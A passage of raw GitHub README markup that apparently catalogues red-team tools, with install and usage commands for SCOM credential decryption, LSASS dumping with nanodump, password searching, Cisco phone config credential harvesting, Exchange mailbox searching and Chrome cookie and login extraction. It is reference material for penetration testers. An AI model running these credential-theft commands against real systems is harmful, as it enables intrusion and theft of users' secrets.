Center\\2010\\Common\\Database\\DatabaseName\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\System Center\\2010\\Common\\Database\\DatabaseServerName\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\System Center\\2010\\Common\\Database\\DatabaseName\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (PS1)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/nccgroup/SCOMDecrypt\ncd .\\SCOMDecrypt\\SCOMDecrypt\\\n. .\\Invoke-SCOMDecrypt.ps1\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003egit clone https://github.com/nccgroup/SCOMDecrypt\ncd .\\SCOMDecrypt\\SCOMDecrypt\\\n. .\\Invoke-SCOMDecrypt.ps1\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Compile)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eUsing \u003ca href=\"https://visualstudio.microsoft.com/vs/community/\" rel=\"nofollow\"\u003eVisual Studio 2019 Community Edition\u003c/a\u003e you can compile the SCOMDecrypt binary.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOpen the SCOMDecrypt \u003ca href=\"https://github.com/nccgroup/SCOMDecrypt\"\u003eproject .sln\u003c/a\u003e, choose \"Release\", and build.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# PS1\nInvoke-SCOMDecrypt\n\n# Compiled C# binary\n.\\SCOMDecrypt.exe\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e PS1\u003c/span\u003e\nInvoke-SCOMDecrypt\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Compiled C# binary\u003c/span\u003e\n.\u003cspan class=\"pl-cce\"\u003e\\S\u003c/span\u003eCOMDecrypt.exe\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210456718-034ba080-602e-423e-8ac3-b62ef0841208.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210456718-034ba080-602e-423e-8ac3-b62ef0841208.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage text used from \u003ca href=\"https://github.com/nccgroup/SCOMDecrypt\"\u003ehttps://github.com/nccgroup/SCOMDecrypt\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/helpsystems/nanodump\"\u003enanodump\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-nanodump\" class=\"anchor\" aria-label=\"Permalink: 🔙nanodump\" href=\"#nanodump\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThe LSASS (Local Security Authority Subsystem Service) is a system process in the Windows operating system that is responsible for enforcing the security policy on the system. It is responsible for a number of tasks related to security, including authenticating users for logon, enforcing security policies, and generating audit logs.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCreating a dump of this process can allow an attacker to extract password hashes or other sensitive information from the process's memory, which could be used to compromise the system further.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis allows for the creation of a minidump of the LSASS process.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/helpsystems/nanodump.git\"\u003e\u003cpre\u003egit clone https://github.com/helpsystems/nanodump.git\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Linux with MinGW)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"make -f Makefile.mingw\"\u003e\u003cpre\u003emake -f Makefile.mingw\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Windows with MSVC)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"nmake -f Makefile.msvc\"\u003e\u003cpre\u003enmake -f Makefile.msvc\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (CobaltStrike only)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eImport the \u003ccode\u003eNanoDump.cna\u003c/code\u003e script on Cobalt Strike.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFull installation information can be found \u003ca href=\"https://github.com/helpsystems/nanodump\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Run\nnanodump.x64.exe\n\n# Leverage the Silent Process Exit technique\nnanodump --silent-process-exit C:\\Windows\\Temp\\\n\n# Leverage the Shtinkering technique\nnanodump --shtinkering\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run\u003c/span\u003e\nnanodump.x64.exe\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Leverage the Silent Process Exit technique\u003c/span\u003e\nnanodump --silent-process-exit C:\u003cspan class=\"pl-cce\"\u003e\\W\u003c/span\u003eindows\u003cspan class=\"pl-cce\"\u003e\\T\u003c/span\u003eemp\\\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Leverage the Shtinkering technique\u003c/span\u003e\nnanodump --shtinkering\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found \u003ca href=\"https://github.com/helpsystems/nanodump#1-usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210985548-a5e69f62-04da-4771-b06b-720147de08d0.jpg\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210985548-a5e69f62-04da-4771-b06b-720147de08d0.jpg\" alt=\"nanodump\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/helpsystems/nanodump\"\u003ehttps://github.com/helpsystems/nanodump\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/t3l3machus/eviltree\"\u003eeviltree\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-eviltree\" class=\"anchor\" aria-label=\"Permalink: 🔙eviltree\" href=\"#eviltree\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA standalone python3 remake of the classic \"tree\" command with the additional feature of searching for user provided keywords/regex in files, highlighting those that contain matches. Created for two main reasons:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eWhile searching for secrets in files of nested directory structures, being able to visualize which files contain user provided keywords/regex patterns and where those files are located in the hierarchy of folders, provides a significant advantage.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003etree\u003c/code\u003e is an amazing tool for analyzing directory structures. It's really handy to have a standalone alternative of the command for post-exploitation enumeration as it is not pre-installed on every linux distro and is kind of limited on Windows (compared to the UNIX version).\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/t3l3machus/eviltree\"\u003e\u003cpre\u003egit clone https://github.com/t3l3machus/eviltree\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Running a regex that essentially matches strings similar to: password = something against /var/www\npython3 eviltree.py -r /var/www -x \u0026quot;.{0,3}passw.{0,3}[=]{1}.{0,18}\u0026quot; -v\n\n# Using comma separated keywords instead of regex\npython3 eviltree.py -r C:\\Users\\USERNAME -k passw,admin,account,login,user -L 3 -v\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Running a regex that essentially matches strings similar to: password = something against /var/www\u003c/span\u003e\npython3 eviltree.py -r /var/www -x \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e.{0,3}passw.{0,3}[=]{1}.{0,18}\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -v\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Using comma separated keywords instead of regex\u003c/span\u003e\npython3 eviltree.py -r C:\u003cspan class=\"pl-cce\"\u003e\\U\u003c/span\u003esers\u003cspan class=\"pl-cce\"\u003e\\U\u003c/span\u003eSERNAME -k passw,admin,account,login,user -L 3 -v\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/212204831-9887b976-dee8-4520-bbd6-e6e69da711ed.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/212204831-9887b976-dee8-4520-bbd6-e6e69da711ed.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/t3l3machus/eviltree\"\u003ehttps://github.com/t3l3machus/eviltree\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/trustedsec/SeeYouCM-Thief\"\u003eSeeYouCM-Thief\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-seeyoucm-thief\" class=\"anchor\" aria-label=\"Permalink: 🔙SeeYouCM-Thief\" href=\"#seeyoucm-thief\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSimple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eWill also optionally enumerate active directory users from the UDS API.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/\" rel=\"nofollow\"\u003eBlog - Exploiting common misconfigurations in cisco phone systems\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/trustedsec/SeeYouCM-Thief\npython3 -m pip install -r requirements.txt\"\u003e\u003cpre\u003egit clone https://github.com/trustedsec/SeeYouCM-Thief\npython3 -m pip install -r requirements.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Enumerate Active Directory users from the UDS api on the CUCM\n./thief.py -H \u0026lt;CUCM server\u0026gt; --userenum\n\n# Without specifying a phone IP address the script will attempt to download every config in the listing.\n./thief.py -H \u0026lt;Cisco CUCM Server\u0026gt; [--verbose]\n\n# Parse the web interface for the CUCM address and will do a reverse lookup for other phones in the same subnet.\n./thief.py --phone \u0026lt;Cisco IP Phoner\u0026gt; [--verbose]\n\n# Specify a subnet to scan with reverse lookups.\n./thief.py --subnet \u0026lt;subnet to scan\u0026gt; [--verbose]\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Enumerate Active Directory users from the UDS api on the CUCM\u003c/span\u003e\n./thief.py -H \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eCUCM server\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e --userenum\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Without specifying a phone IP address the script will attempt to download every config in the listing.\u003c/span\u003e\n./thief.py -H \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eCisco CUCM Server\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e [--verbose]\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Parse the web interface for the CUCM address and will do a reverse lookup for other phones in the same subnet.\u003c/span\u003e\n./thief.py --phone \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eCisco IP Phoner\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e [--verbose]\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Specify a subnet to scan with reverse lookups.\u003c/span\u003e\n./thief.py --subnet \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003esubnet to scan\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e [--verbose]\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/212204860-a20c83dd-a4f7-4c6f-a760-5925d4ae1e03.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/212204860-a20c83dd-a4f7-4c6f-a760-5925d4ae1e03.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/\" rel=\"nofollow\"\u003ehttps://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/dafthack/MailSniper\"\u003eMailSniper\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-mailsniper\" class=\"anchor\" aria-label=\"Permalink: 🔙MailSniper\" href=\"#mailsniper\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eMailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email or by an Exchange administrator to search the mailboxes of every user in a domain.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eMailSniper also includes additional modules for password spraying, enumerating users and domains, gathering the Global Address List (GAL) from OWA and EWS and checking mailbox permissions for every Exchange user at an organization.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eNice blog post with more information about \u003ca href=\"https://www.blackhillsinfosec.com/introducing-mailsniper-a-tool-for-searching-every-users-email-for-sensitive-data/\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"http://www.dafthack.com/files/MailSniper-Field-Manual.pdf\" rel=\"nofollow\"\u003eMailSniper Field Manual\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/dafthack/MailSniper\ncd MailSniper\nImport-Module MailSniper.ps1\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003egit clone https://github.com/dafthack/MailSniper\ncd MailSniper\nImport-Module MailSniper.ps1\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Search current users mailbox\nInvoke-SelfSearch -Mailbox current-user@domain.com\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Search current users mailbox\u003c/span\u003e\nInvoke-SelfSearch -Mailbox current-user@domain.com\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/217654320-3d74551c-e37a-4398-b354-a1ed7f982cd0.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/217654320-3d74551c-e37a-4398-b354-a1ed7f982cd0.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://patrowl.io/\" rel=\"nofollow\"\u003ehttps://patrowl.io/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/djhohnstein/SharpChromium\"\u003eSharpChromium\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-sharpchromium\" class=\"anchor\" aria-label=\"Permalink: 🔙SharpChromium\" href=\"#sharpchromium\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSharpChromium is a .NET 4.0+ CLR project to retrieve data from Google Chrome, Microsoft Edge, and Microsoft Edge Beta. Currently, it can extract:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eCookies (in JSON format)\u003c/li\u003e\n\u003cli\u003eHistory (with associated cookies for each history item)\u003c/li\u003e\n\u003cli\u003eSaved Logins\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003eThis rewrite has several advantages to previous implementations, which include:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eNo Type compilation or reflection required\u003c/li\u003e\n\u003cli\u003eCookies are displayed in JSON format, for easy importing into Cookie Editor.\u003c/li\u003e\n\u003cli\u003eNo downloading SQLite assemblies from remote resources.\u003c/li\u003e\n\u003cli\u003eSupports major Chromium browsers (but extendable to others)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eUsing \u003ca href=\"https://visualstudio.microsoft.com/downloads/\" rel=\"nofollow\"\u003eVisual Studio Community Edition\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOpen up the project .sln, choose \"release\", and build.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Retrieve cookies associated with Google Docs and Github\n.\\SharpChromium.exe cookies docs.google.com github.com\n\n# Retrieve history items and their associated cookies.\n.\\SharpChromium.exe history\n\n# Retrieve saved logins (Note: Only displays those with non-empty passwords):\n.\\SharpChromium.exe logins\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Retrieve cookies associated with Google Docs and Github\u003c/span\u003e\n.\u003cspan class=\"pl-cce\"\u003e\\S\u003c/span\u003eharpChromium.exe cookies docs.google.com github.com\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Retrieve history items and their associated cookies.\u003c/span\u003e\n.\u003cspan class=\"pl-cce\"\u003e\\S\u003c/span\u003eharpChromium.exe \u003cspan class=\"pl-c1\"\u003ehistory\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Retrieve saved logins (Note: Only displays those with non-empty passwords):\u003c/span\u003e\n.\u003cspan class=\"pl-cce\"\u003e\\S\u003c/span\u003eharpChromium.exe logins\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/220959335-6e7a8275-bad9-4c3f-883f-2d7ab6749b75.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/220959335-6e7a8275-bad9-4c3f-883f-2d7ab6749b75.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/djhohnstein/SharpChromium\"\u003ehttps://github.com/djhohnstein/SharpChromium\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/zblurx/dploot\"\u003edploot\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-dploot\" class=\"anchor\" aria-label=\"Permalink: 🔙dploot\" href=\"#dploot\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 